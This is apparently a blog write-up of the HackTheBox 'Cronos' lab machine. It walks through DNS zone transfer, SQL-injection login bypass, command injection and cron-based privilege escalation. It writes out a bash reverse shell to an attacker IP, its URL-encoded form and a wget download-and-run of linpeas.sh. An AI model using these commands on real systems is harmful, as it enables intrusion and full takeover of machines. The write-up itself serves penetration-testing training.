All Articles

Cronos Writeup - HackTheBox -

cronos

This is a writeup of Cronos machine, which has a medium level.

  1. Enumeration
  2. User Flag
  3. Priviledge Escalation

Enumeration

nmap found 3 open ports, 22(SSH), 53(DNS), 80(HTTP).

nmap

When I go to 10.10.10.13 in browser, I see the apache default page.

apache

I tries to check if there are any pages with gobuster, but doesn’t find anything.

gobuster_10101013

It might be the case that I have to resolve ip with a domain. nslookup finds ns1.cronos.htb domain.

nslookup

I learned DNS Zone Transfers in Footprint module. Since port 53 is opened, I try to find other domains. There is additionally admin.cronos.htb domain.

zone_transfer

Now I set these domains in /etc/hosts file to resolve these domains.

10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb

When I go to cronos.htb page, there is a webpage. However, there is nothing special.

cronos.htb

gobuster doesn’t find any pages, either.

gobuster_cronos_htb

Now it’s time to go to admin.cronos.htb page. There is a login page. It can be the initial foothold.

admin.cronos.htb

User Flag

As the first attempt, I tries to do a basic sql injection.

sql_injection

Surprisingly, it works. there is a page where I can execute traceroute command. But, when I click the execute! button, it doesn’t show anything.

admin_page

Now it’s time to use Burpsuite. I try to change the command parameter and make host parameter empty.

burpsuite_ls

It returns a file list. So, this endpoint has a command injection vulnerability so that I can execute shell commands by changing the request parameter.

burpsuite_ls_result

It’s time to do a reverse shell. I use the command below. 10.10.16.2 is my machine ip address.

/bin/bash -i >& /dev/tcp/10.10.16.2/1234 0>&1

In order to execute the reverse shell command, the command needs to be url-encoded like this below.

%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.2%2F1234%200%3E%261%0A

burpsuite_reverse_shell

I get the reverse shell!

reverse_shell

The shell is without TTY, so I spawn TTY shell. The detail about Shell spawning is written here.

spawn_tty

I’m a www-data user, but can read user.txt.

user_txt

Priviledge Escalation

To find any hints for priviledge escalation, I use linpeas.sh. I run a python server in the directory where linpeas.sh exists in my machine.

python3 -m http.server 80

Then, download and execute it in the target machine.

wget http://10.10.16.2/linpeas.sh
chmod +x linpeas.sh
bash linpeas.sh

linpeas.sh finds a cron job that executes artisan file with the root user. This cron is executed every minute.

crontab

artisan file is a php script.

file_artisan

So, by replacing artisan file with a php reverse shell, I can get a root shell. I download php-reverse-shell.php in my machine and change $ip into my machine and $port into 9999. Now download the php reverse shell in the target machine and rename it into artisan.

download_artisan

When the cron executes artisan file, I get a root shell!

get_root

Published Mar 23, 2023

Backend engineer, living in BerlinHiroki Fujino on Twitter